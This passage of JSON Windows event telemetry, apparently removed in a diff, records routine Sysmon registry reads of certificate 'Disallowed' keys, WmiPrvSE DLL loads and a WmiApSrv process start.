"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "winsta.dll", - "image_path": "C:\\Windows\\System32\\winsta.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "utildll.dll", - "image_path": "C:\\Windows\\System32\\utildll.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "setupapi.dll", - "image_path": "C:\\Windows\\System32\\setupapi.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "srvcli.dll", - "image_path": "C:\\Windows\\System32\\srvcli.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480730000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480730000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "logoncli.dll", - "image_path": "C:\\Windows\\System32\\logoncli.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480730000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480730000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "C:\\WINDOWS\\system32\\wbem\\WmiApSrv.exe", - "event_type": "process", - "logon_id": 999, - "parent_process_name": "services.exe", - "parent_process_path": "C:\\Windows\\System32\\services.exe", - "pid": 7720, - "ppid": 568, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "subtype": "create", - "timestamp": 131883573480880000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}", - "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 